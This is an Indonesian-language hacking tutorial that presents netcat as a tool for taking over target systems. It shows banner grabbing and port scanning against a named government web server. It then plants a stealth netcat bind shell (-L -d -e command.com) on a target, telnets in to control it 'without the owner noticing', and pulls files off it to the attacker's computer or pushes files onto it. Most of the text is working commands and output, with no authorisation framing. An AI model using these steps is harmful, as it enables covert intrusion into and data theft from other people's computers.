NETCAT TOOLS ANDALAN HACKER
Oleh yerianto@yahoo.com
Tools pertama yang akan kami bahas adalah netcat, yang sering disebut sebagai “TCP/IP swiss army knife”-nya para hacker. Versi orisinalnya adalah ditulis untuk sistem operasi Unix oleh *hobbit* (hobbit@avian.org). Versi Windows NT dikerjakan oleh Wld Pond (weld@l0pth.com).
Feature yang sering dimanfaatkan oleh hacker adalah:
• Mengambil alih console sistem target dari remote sistem
• Banner grabbing
• Port scanning
Netcat tersedia untuk berbagai sistem operasi mulai dari Linux, Unix sampai dengan Windows. Pada pembahasan kali ini, penulis sengaja menggunakan netcat versi Windows dengan menggunakan command line. Hal ini dimaksudkan agar mudah dipahami oleh para pemula.
Instalasi
Instalasi netcat pada sistem operasi Windows sangat sederhana. Pertama download netcat dari internet antara lain dapat diambil dari:
www.netcat.org
kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download yaitu nc11nt.zip ke dalam sebuah direktori sebagai berikut:
C:\TMP\NETCAT>dir
Volume in drive C has no label.
Volume Serial Number is 141F-1208
Directory of C:\TMP\NETCAT
02/23/2003 05:03 PM
.
02/23/2003 05:03 PM ..
11/03/1994 07:07 PM 4,765 GETOPT.H
01/04/1998 03:17 PM 69,081 NETCAT.C
01/03/1998 02:37 PM 59,392 NC.EXE
11/28/1997 02:48 PM 12,039 DOEXEC.C
11/28/1997 02:36 PM 544 MAKEFILE
11/06/1996 10:40 PM 22,784 GETOPT.C
07/09/1996 04:01 PM 7,283 GENERIC.H
02/06/1998 03:50 PM 61,780 HOBBIT.TXT
02/06/1998 05:53 PM 6,771 README.TXT
02/22/2000 11:24 AM 2,044 AVEXTRA.TXT
10 File(s) 246,483 bytes
2 Dir(s) 8,868,044,800 bytes free
C:\TMP\NETCAT>
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan bila Anda perlu melakukan kompilasi ulang.
Cara pakai netcat
Pada DOS console windows, netcat dijalankan dengan mengetikkan:
C:\> nc –opsi
Dapat juga pada console netcat dengan mengetikkan:
C:\> nc
Cmd line: -opsi
Untuk mengetahui opsi lengkapnya dapat menggunakan help sebagai berikut:
C:\TMP\NETCAT>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
C:\TMP\NETCAT>
Mari kita coba kemampuan netcat untuk mengambil header suatu situs web yang biasanya terdapat banyak informasi awal dari sistem target sebagai berikut:
C:\TMP\NETCAT>nc -v 128.1.9.81 80
adminristek [128.1.9.81] 80 (http) open
header/http
501 Method Not Implemented
Method Not Implemented
header/http to /index.html not supported.
Invalid method in request header/http
Apache/1.3.12 Server at adminristek.bppn.go.id Port 80
C:\TMP\NETCAT>
Dari contoh di atas Anda dapat melihat nomor Ip sistem target, jenis sistem operasinya dan juga sistem aplikasi yang dipergunakan (Apache).
Pada bab sebelumnya juga telah dijelaskan bagaimana netcat dapat dipergunakan sebagai port scanner untuk melihat port mana saja yang terbuka. Berikut ini contoh untuk memeriksa status port web dari port 10 s./d port 140 dari situs web tertentu, sebagai berikut:
C:\TMP\NETCAT>nc -v -z 128.1.9.81 10-140
adminristek [128.1.9.81] 139 (netbios-ssn) open
adminristek [128.1.9.81] 113 (auth) open
adminristek [128.1.9.81] 110 (pop3) open
adminristek [128.1.9.81] 98 (?) open
adminristek [128.1.9.81] 80 (http) open
adminristek [128.1.9.81] 79 (finger) open
adminristek [128.1.9.81] 25 (smtp) open
adminristek [128.1.9.81] 23 (telnet) open
adminristek [128.1.9.81] 21 (ftp) open
C:\TMP\NETCAT>
Pada contoh berikut ini merupakan salah satu kehebatan netcat yang juga sangat banyak dimanfaatkan oleh para hacker untuk mengambil alih sistem target. Caranya adalah menjadikan sistem target sebagai server telnet sebagai berikut:
Pada sistem target lakukan langkah sebagai berikut:
C:\NETCAT> nc –L –p 23 –d –e command.com
C:\NETCAT>
Opsi –L merupakan mode listening, opsi –p menujukkan koneksi dilakukan via port 23 dan Anda dapat menggunakan port lainnya jika diperlukan untuk mengecoh firewall. Opsi berikutnya yang sangat dahsyat adalah –d yaitu agar telnet dijalankan secara tersembunyi atau stealth. Opsi terakhir –e akan mengeksekusi perintah command.exe untuk dipergunakan koneksi telnet yang masuk dan Anda dapat mengganti dengan perintah lainnya.
Selanjutnya untuk mengambil alih sistem target, Anda cukup memanggil telnet dari komputer Anda.
C:\> telnet 128.1.71.63
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.
C:\NETCAT>dir
Anda sudah masuk ke dalam sistem target dengan diberikan prompt DOS milik sistem target ! Anda tinggal berjalan-jalan di dalam sistrem target seolah-olah adalah komputer Anda sendiri tanpa disadari oleh sang pemiliknya. Perintah apapun dapat Anda lakukan secara remote seperti dir, copy, delete dan sebagainya.
C:\NETCAT>dir
dir
Volume in drive C has no label
Volume Serial Number is 0C42-12EA
Directory of C:\NETCAT
. 01-04-02 11:48a .
.. 01-04-02 11:48a ..
DOEXEC C 12,039 11-28-97 2:48p DOEXEC.C
GENERIC H 7,283 07-09-96 4:01p GENERIC.H
GETOPT C 22,784 11-06-96 10:40p GETOPT.C
GETOPT H 4,765 11-03-94 7:07p GETOPT.H
HOBBIT TXT 61,780 02-06-98 3:50p HOBBIT.TXT
MAKEFILE 544 11-28-97 2:36p MAKEFILE
NC EXE 59,392 01-03-98 2:37p NC.EXE
NETCAT C 69,081 01-04-98 3:17p NETCAT.C
README TXT 6,771 02-06-98 5:53p README.TXT
9 file(s) 244,439 bytes
2 dir(s) 353,669,120 bytes free
C:\NETCAT>
Jika Anda sudah berada di dalam sistem target, pasti Anda tertarik untuk mendownload data dari sistem target ke komputer Anda atau sebaliknya mengupload data Anda ke sistem target. Dengan netcat Anda dapat melakukan dengan mudah sebagai berikut:
Pada sistem target ketikkan perintah:
Nc –l –p 55555 < namafile.pdf
Pada komputer yang akan menerima file ketikkan perintah:
Nc –v 128.1.71.63 > namafile.pdf
NOTERIST [128.1.71.63] 55555 (?) open
^C
Tekan kontrol-C jika file telah selesai Anda transfer. Metode ini sering disebut metode pull. Jika Anda ingin mengirim file atau upload data dari komputer Anda ke sistem target, maka yang perlu dilakukan adalah sebagai berikut:
Pada sistem target ketikkan perintah:
Nc –l –p 55555 > namafile2.pdf
Pada komputer Anda yang akan mengirim atau upload file ke sistem target ketikkan perintah:
Nc 128.1.71.63 55555 < namafile2.pdf
^C
Masih banyak fasilitas lain yang dapat Anda coba sendiri dari netcat.
Thx